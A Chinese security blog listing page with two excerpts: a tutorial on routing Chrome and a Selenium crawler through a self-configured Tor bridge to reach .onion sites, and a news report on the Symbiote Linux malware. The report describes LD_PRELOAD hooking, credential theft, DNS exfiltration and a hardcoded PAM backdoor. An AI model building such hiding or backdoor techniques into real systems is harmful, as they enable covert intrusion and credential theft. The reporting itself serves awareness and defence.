  • 在Windows系统上设置Tor代理,使用Chrome浏览器访问暗网

    大家都知道如何访问暗网,正如“Kirin博客”之前介绍:如何通过三个步骤简单的使用Tor浏览器访问暗网。但是,假如不使用Tor浏览器,不使用Brave浏览器,使用日常用的浏览器,如Chrome浏览器、Firefox火狐浏览器,可以访问暗网吗?怎么在Windows系统上设置Tor代理,利用Tor节点访问网络?本文将做简单的介绍,从而可以做到暗网的爬取与监控。 一、下载Windows专家包和Tor浏览器 下载Windows专家包,解压到桌面上。 下载Tor浏览器(版本取决于您的计算机)。使用默认设置运行.exe并安装。 在“文件夹选项”中设置显示隐藏的项目和文件扩展名:在资源管理器窗口的左上角,单击“查看”选项卡。在最右侧的显示/隐藏部分中,选中隐藏项目的复选框;选中文件扩展名的复选框。 二、组合文件并重定位 打开桌面上的Tor文件夹,双击tor.exe。一旦命令提示符显示:[notice] Bootstrapped 100% (done): Done,关闭窗口。这将创建文件夹C:\Users\\AppData\Roaming\tor\(其中您的用户名)。 从桌面上的Tor文件夹中,选择所有.dll和.exe文件,并将它们剪切/粘贴到C:\Users\\AppData\Roaming\tor\文件夹中。 在桌面上的Tor文件夹中,打开Data文件夹。同时选择geoip和geoip6,并将它们剪切/粘贴到C:\Users\\AppData\Roaming\tor\文件夹中。 打开C:\Users\\Desktop\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports文件夹,选择obfs4proxy.exe并将其剪切/粘贴到C:\Users\\AppData\Roaming\tor\文件夹中。 三、创建和编辑您的Tor配置文件 在C:\Users\\AppData\Roaming\tor\文件夹中,创建新文件,命名为torrc,注意不设置扩展名。 使用文件编辑器打开(如记事本)torrc文件,添加以下内容: Log notice file C:\Users\<user>\AppData\Roaming\tor\notice.log GeoIPFile C:\Users\<user>\AppData\Roaming\tor\geoip GeoIPv6File C:\Users\<user>\AppData\Roaming\tor\geoip6 BridgeRelay 1 # Replace "TODO1" with a Tor port of your choice. # This port must be externally reachable. # Avoid port 9001 because it's commonly associated with Tor and censors may be scanning the Internet for this port. ORPort TODO1 ServerTransportPlugin obfs4 exec C:\Users\<user>\AppData\Roaming\tor\obfs4proxy.exe # Replace "TODO2" with an obfs4 port of your choice. # This port must be externally reachable and must be different from the one specified for ORPort. # Avoid port 9001 because it's commonly associated with Tor and censors may be scanning the Internet for this port. ServerTransportListenAddr obfs4 0.0.0.0:TODO2 # Local communication port between Tor and obfs4. Always set this to "auto". # "Ext" means "extended", not "external". Don't try to set a specific port number, nor listen on 0.0.0.0. ExtORPort auto # Replace "<address@email.com>" with your email address so we can contact you if there are problems with your bridge. # This is optional but encouraged. ContactInfo <address@email.com> # Pick a nickname that you like for your bridge. This is optional. Nickname PickANickname 不要忘记更改ORPort、ServerTransportListenAddr、ContactInfo、和Nickname项目的值。 使用一个大于1024的固定obfs4端口,但是要避免使用9001端口。 请注意,Tor的OR端口及其obfs4端口都必须是可访问的。如果您的网桥位于防火墙或NAT之后,请确保打开两个端口。您可以使用我们的可达性测试来查看您的obfs4端口是否可以从Internet访问。 为了能够本地解析,在torrc文件底部加上: DNSPort 53 AutomapHostsOnResolve 1 AutomapHostsSuffixes .onion 四、使用cmd启动Tor 打开命令提示符应用程序cmd,使用以下命令切换到您的工作目录:cd C:\Users\\AppData\Roaming\tor\ 执行命令:tor.exe -f torrc 五、监控tor.exe执行日志 要确认您的网桥正常运行,应该查看:C:\Users\\AppData\Roaming\tor\notice.log,日志如下所示: [notice] Your Tor server’s identity key fingerprint is ‘ ‘ [notice] Your Tor bridge’s hashed identity key fingerprint is ‘ ‘ [notice] Tor has successfully opened a circuit. Looks like client functionality is working. [notice] Bootstrapped 100%: Done [notice] Now checking whether ORPort :3818 is reachable… (this may take up to 20 minutes — look for log messages indicating success) [notice] Self-testing indicates your ORPort is reachable from the outside. Excellent. Publishing server descriptor. 六、下载并设置SocksCap等代理工具,配置本地DNS 以SocksCap64为例,下载安装后,添加代理127.0.0.1,端口为9050,测试连通性。 修改本地DNS的次选项为127.0.0.1。 在SocksCap64程序中添加Chrome等浏览器,打开后,可以直接访问.onion域名了。 如打开Onion666暗网导航:http://666666666tjjjeweu5iikuj7hkpke5phvdylcless7g4dn6vma2xxcad.onion/ 七、Selenium爬虫使用Tor的简单配置 from selenium import webdriver chrome_options = webdriver.ChromeOptions() chrome_options.add_argument('--proxy-server=socks5://127.0.0.1:9050') driver = webdriver.Chrome(chrome_options=chrome_options) driver.get('https://onion666.com') 八、配置文件样例 Log notice file C:\Users\administrator\AppData\Roaming\tor\notice.log GeoIPFile C:\Users\administrator\AppData\Roaming\tor\geoip GeoIPv6File C:\Users\administrator\AppData\Roaming\tor\geoip6 BridgeRelay 1 # Replace "TODO1" with a Tor port of your choice. # This port must be externally reachable. # Avoid port 9001 because it's commonly associated with Tor and censors may be scanning the Internet for this port. ORPort 54078 ServerTransportPlugin obfs4 exec C:\Users\administrator\AppData\Roaming\tor\obfs4proxy.exe # Replace "TODO2" with an obfs4 port of your choice. # This port must be externally reachable and must be different from the one specified for ORPort. # Avoid port 9001 because it's commonly associated with Tor and censors may be scanning the Internet for this port. ServerTransportListenAddr obfs4 0.0.0.0:54079 # Local communication port between Tor and obfs4. Always set this to "auto". # "Ext" means "extended", not "external". Don't try to set a specific port number, nor listen on 0.0.0.0. ExtORPort auto # Replace "<address@email.com>" with your email address so we can contact you if there are problems with your bridge. # This is optional but encouraged. ContactInfo admin@anwangxia.com # Pick a nickname that you like for your bridge. This is optional. Nickname anwangxia DNSPort 53 AutomapHostsOnResolve 1 AutomapHostsSuffixes .onion...

    2022-07-26 524
  • “几乎不可能被检测到”的Linux恶意软件

    研究人员表示,一种“几乎不可能检测到”的新Linux恶意软件已经出现,它不仅可以收集凭据,并且可以通过寄生方式感染目标,为攻击者提供远程访问和rootkit功能。 安全研究员Joakim Kennedy在上周发布的黑莓威胁矢量博客上的一篇文章中写道,黑莓研究和情报团队的研究人员一直在跟踪恶意软件,他们是在2021年11月最早检测到该恶意软件。 研究人员恰当地将恶意软件称为“共生体”,该恶意软件显然是针对拉丁美洲金融部门的。在生物学中,这个词指的是与另一个生物体共生的生物体。 Kennedy解释说,选取这个名字其实是为了突出恶意软件操作方式,因为该软件的操作方式前所未见,与研究人员遇到的其他Linux恶意软件不同。 他写道:“Symbiote与众不同......在于,它需要感染其他正在运行的进程,才能对受感染的机器造成损害。”“它不是为感染机器而运行的独立可执行文件,而是一个共享对象(SO)库,使用LD_PRELOAD(T1574.006)加载到所有正在运行的进程中,并寄生虫式地感染机器。” Kennedy说,一旦Symbiote感染了所有运行进程,威胁行为者就可以从事各种邪恶的活动,包括远程使用rootkit功能、收集凭据的能力和远程访问能力。 他补充说,除了rootkit功能外,恶意软件还为威胁行为者提供了一个后门,以便使用硬编码密码作为机器上的任何用户登录,并以最高权限执行命令。 规避机动 研究人员表示,共生体的行为并不是唯一使其独一无二的东西。他说,它本身也具有非常强大的规避功能,以至于它“可能在雷达的搜索下飞行”,因此很难知道它是否被威胁行为者使用。 研究人员发现,它使用的一些规避策略是,根据设计,它由链接器通过LD_PRELOAD指令加载,该指令允许在任何其他共享对象之前加载。他们说,首先加载的特权允许它劫持从为应用程序加载的其他库文件中导入。Kennedy说,通过这种方式,它通过钩住libc和libpcap函数来隐藏其在机器上的存在。 他解释说:“一旦恶意软件感染了机器,它就会隐藏自己和威胁行为者使用的任何其他恶意软件,使感染很难检测到。”“在受感染的机器上进行实时取证可能不会出现任何问题,因为所有文件、进程和网络工件都被恶意软件隐藏了。” 事实上,研究人员表示,他们自己无法发现足够的证据来确定威胁行为者目前是否“在高度针对性或广泛的攻击中使用共生生物”。 研究人员指出,不寻常的DNS请求可能是检测系统上是否存在恶意软件的一种方式。然而,他们说,旨在检测和响应的典型防病毒或其他安全工具不会接收Symbiote,这使得使用依赖这些保护的Linux的组织面临风险。 目标 Kennedy指出,攻击者挥舞共生体的主要目标是“捕获证书,并为后门访问受感染的机器提供便利”。他详细概述了恶意软件如何实现这两项活动。 Kennedy说,对于凭据收集,Symbiote会钩住libc读取函数;如果ssh或scp进程调用该函数,它会捕获凭据,这些凭据首先使用嵌入式密钥使用RC4加密,然后写入文件。 他补充说,攻击者不仅在本地窃取凭据进行访问,还通过十六进制编码和将通过DNS地址记录请求发送的数据分块到他们控制的域名来过滤它们。 Kennedy说,为了远程访问受感染的机器,该恶意软件挂钩了一些Linux可插拔身份验证模块(PAM)功能,允许它使用任何使用PAM的服务对机器进行身份验证,包括安全外壳(SSH)等远程服务。 他解释说:“当服务试图使用PAM对用户进行身份验证时,恶意软件会根据硬编码密码检查提供的密码。”“如果提供的密码是匹配的,则钩住函数将返回成功响应。” Kennedy说,一旦威胁行为者完成身份验证,Symbiote允许攻击者通过扫描环境以查找变量HTTP_SETTHIS来获得根特权。 他解释说:“如果变量是用内容设置的,恶意软件会将有效用户和组ID更改为根用户,然后在通过系统命令执行内容之前清除变量。” ...

    2022-07-16 415

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注